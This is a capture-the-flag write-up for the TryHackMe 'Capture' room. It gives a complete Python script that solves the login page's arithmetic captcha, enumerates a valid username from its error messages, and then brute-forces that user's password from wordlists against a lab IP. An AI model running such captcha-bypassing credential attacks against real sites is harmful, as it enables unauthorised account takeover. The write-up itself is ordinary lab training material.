Capture!

https://tryhackme.com/room/capture

This room provides a nice coding challenge. After a couple of failed logins we are prompted with a home-made Captcha.

I made a Python script to solve the challenge.

This script attempts to perform a brute force attack on the login page.

It uses Python's "requests" library to send HTTP requests to the website. It then reads a list of usernames and passwords from files, sets the target website's IP address, initializes a session, and defines functions to solve the Captcha and attempt a login with a given username and password.

It then brute forces the username and password by iterating through the lists of usernames and passwords and calling the relevant functions.

The code uses string manipulations to extract information from the response content of the login page.

Note that you could probably simplify the script e.g. by merging the two functions attempt_username(...) and attempt_password(...), but this does the trick.

import requests

# Candidate lists: one entry per line, read verbatim (blank lines included)
def _load_lines(path):
    """Return every line of *path* as a list, without line endings."""
    with open(path, 'r') as f:
        return f.read().splitlines()


usernames = _load_lines('usernames copy.txt')
passwords = _load_lines('passwords copy.txt')

# Address of the lab machine; edit before running
IP = "10.10.10.10"

# One session is reused so the server-side state follows the whole run;
# `captcha` is an (answer, accepted) pair and starts with a placeholder answer
session = requests.Session()
captcha = ('1', False)


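def solve_captcha(response_content):
    """Extract the arithmetic challenge from the login page and return its value.

    The challenge sits on the line that follows the "Captcha enabled" label
    and is expected to look like ``<a> <op> <b>`` (three whitespace-separated
    tokens).

    Args:
        response_content: HTML of the login page, as a string.

    Returns:
        The integer result of the challenge.

    Raises:
        ValueError: if the label is absent, the challenge line does not hold
            three tokens, or the operands are not integers.
    """
    label = '<label for="usr"><b><h3>Captcha enabled</h3></b></label><br>'
    label_index = response_content.find(label)
    if label_index == -1:
        # find() would otherwise return -1 and the offset arithmetic below
        # would silently slice an unrelated part of the page.
        raise ValueError("captcha label not found in response")

    # The expression begins 5 characters after the label; presumably the
    # markup in between — TODO confirm against the live page if this breaks.
    start_index = label_index + len(label) + 5
    end_index = response_content.find('\n', start_index)
    if end_index == -1:
        # No trailing newline: take the rest of the document.
        end_index = len(response_content)
    line = response_content[start_index:end_index]

    tokens = line.split()
    if len(tokens) < 3:
        raise ValueError(f"unexpected captcha line: {line!r}")
    lhs, opr, rhs = int(tokens[0]), tokens[1], int(tokens[2])

    if opr == "+":
        return lhs + rhs
    if opr == "-":
        return lhs - rhs
    # Any other operator is treated as multiplication, as the original did.
    return lhs * rhs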


def attempt_username(username, password, captcha):
    """Submit one login form and report whether the username was rejected.

    Args:
        username: candidate username.
        password: password sent alongside it.
        captcha: ``(answer, accepted)`` pair from the previous attempt; only
            ``answer`` is sent, in the ``captcha`` form field.

    Returns:
        ``(next_answer, accepted)`` where ``next_answer`` is the solved
        challenge from the page just received and ``accepted`` is False when
        the page contains the "The user" or "Invalid captcha" error marker.

    Note: errors raised by ``solve_captcha`` propagate from here, unlike in
    ``attempt_password``.
    """
    form = {
        'username': username,
        'password': password,
        'captcha': captcha[0],
    }
    page = session.post(f"http://{IP}/login", data=form).text

    next_answer = solve_captcha(page)

    rejection_markers = (
        "<p class=\"error\"><strong>Error:</strong> The user",
        "<p class=\"error\"><strong>Error:</strong> Invalid captcha",
    )
    rejected = any(marker in page for marker in rejection_markers)
    return next_answer, not rejected


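def attempt_password(username, password, captcha):
    """Submit one login form and report whether the password was rejected.

    Args:
        username: username to log in as.
        password: candidate password.
        captcha: ``(answer, accepted)`` pair from the previous attempt; only
            ``answer`` is sent, in the ``captcha`` form field.

    Returns:
        ``(next_answer, accepted)`` where ``next_answer`` is the solved
        challenge from the page just received (or the placeholder
        ``('1', False)`` when it could not be parsed) and ``accepted`` is
        False when the page contains the "Invalid password for user" or
        "Invalid captcha" error marker.
    """
    form = {
        'username': username,
        'password': password,
        'captcha': captcha[0],
    }
    page = session.post(f"http://{IP}/login", data=form).text

    try:
        next_answer = solve_captcha(page)
    except (ValueError, IndexError):
        # Only the parse failures solve_captcha can raise are swallowed
        # (the original used a bare `except:`, which also hid KeyboardInterrupt).
        # NOTE(review): this nests the whole placeholder pair as the answer,
        # so the next request sends the tuple in the captcha field; kept as
        # the original did it.
        next_answer = ('1', False)

    rejection_markers = (
        "<p class=\"error\"><strong>Error:</strong> Invalid password for user",
        "<p class=\"error\"><strong>Error:</strong> Invalid captcha",
    )
    rejected = any(marker in page for marker in rejection_markers)
    return next_answer, not rejected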


# Stage 1: walk the username list with a fixed placeholder password
print("Attempting to brute force username...")
for username in usernames:
    captcha = attempt_username(username, "test", captcha)
    _, accepted = captcha
    if accepted:
        print(f"Username found: {username}")
        break
# If nothing matched, `username` is simply the last entry of the list.

# Stage 2: walk the password list for that username
print(f"Attempting to brute force password for user \"{username}\"...")
for password in passwords:
    captcha = attempt_password(username, password, captcha)
    _, accepted = captcha
    if accepted:
        print(f"Password found: {password}")
        break
